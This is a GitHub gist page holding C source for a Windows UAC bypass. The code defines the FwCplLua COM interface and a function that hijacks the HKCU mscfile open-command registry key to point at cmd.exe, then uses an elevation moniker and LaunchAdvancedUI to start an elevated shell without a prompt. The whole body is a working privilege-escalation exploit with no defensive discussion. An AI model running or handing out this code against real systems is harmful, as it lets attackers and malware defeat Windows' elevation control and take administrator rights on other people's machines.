Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IFwCplLua * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in IFwCplLua * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method2)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method3)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method4)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method5)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method6)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method7)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method8)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method10)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method11)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method12)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method13)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method14)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method15)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *LaunchAdvancedUI)(
__RPC__in IFwCplLua * This);
END_INTERFACE
} *PIFwCplLuaInterfaceVtbl;
interface IFwCplLua
{
CONST_VTBL struct IFwCplLuaInterfaceVtbl *lpVtbl;
};
#define T_CLSID_FwCplLua L"{752438CB-E941-433F-BCB4-8B7D2329F0C8}"
#define T_IID_IFwCplLua L"{56DA8B35-7FC3-45DF-8768-664147864573}"
BOOL Method42b_Test(
LPWSTR lpszPayload
)
{
HRESULT r = E_FAIL;
BOOL bCond = FALSE;
LPWSTR lpBuffer = NULL;
LRESULT lResult;
HKEY hKey = NULL;
SIZE_T sz = 0;
IID xIIDFwCplLua;
IFwCplLua *FwCplLua = NULL;
BIND_OPTS3 bop;
WCHAR szBuffer[MAX_PATH + 1];
WCHAR szElevationMoniker[MAX_PATH];
do {
if (IIDFromString(T_IID_IFwCplLua, &xIIDFwCplLua) != S_OK) {
break;
}
_strcpy(szBuffer, L"C:\\windows\\system32\\cmd.exe");
lpBuffer = szBuffer;
sz = _strlen(lpBuffer);
if (sz == 0)
break;
lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
L"Software\\Classes\\mscfile\\shell\\open\\command",
0,
NULL,
REG_OPTION_NON_VOLATILE,
MAXIMUM_ALLOWED,
NULL,
&hKey,
NULL);
if (lResult != ERROR_SUCCESS)
break;
sz = (1 + sz) * sizeof(WCHAR);
lResult = RegSetValueEx(
hKey,
TEXT(""),
0,
REG_SZ,
(BYTE*)lpBuffer,
(DWORD)sz);
if (lResult != ERROR_SUCCESS)
break;
RegCloseKey(hKey);
hKey = NULL;
_strcpy(szElevationMoniker, L"Elevation:Administrator!new:");
_strcat(szElevationMoniker, T_CLSID_FwCplLua);
RtlSecureZeroMemory(&bop, sizeof(bop));
bop.cbStruct = sizeof(bop);
bop.dwClassContext = CLSCTX_LOCAL_SERVER;
r = CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, &xIIDFwCplLua, &FwCplLua);
if (r != S_OK)
break;
if (FwCplLua == NULL) {
r = E_FAIL;
break;
}
r = FwCplLua->lpVtbl->LaunchAdvancedUI(FwCplLua);
} while (bCond);
if (hKey != NULL)
RegCloseKey(hKey);
if (FwCplLua != NULL) {
FwCplLua->lpVtbl->Release(FwCplLua);
}
return SUCCEEDED(r);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment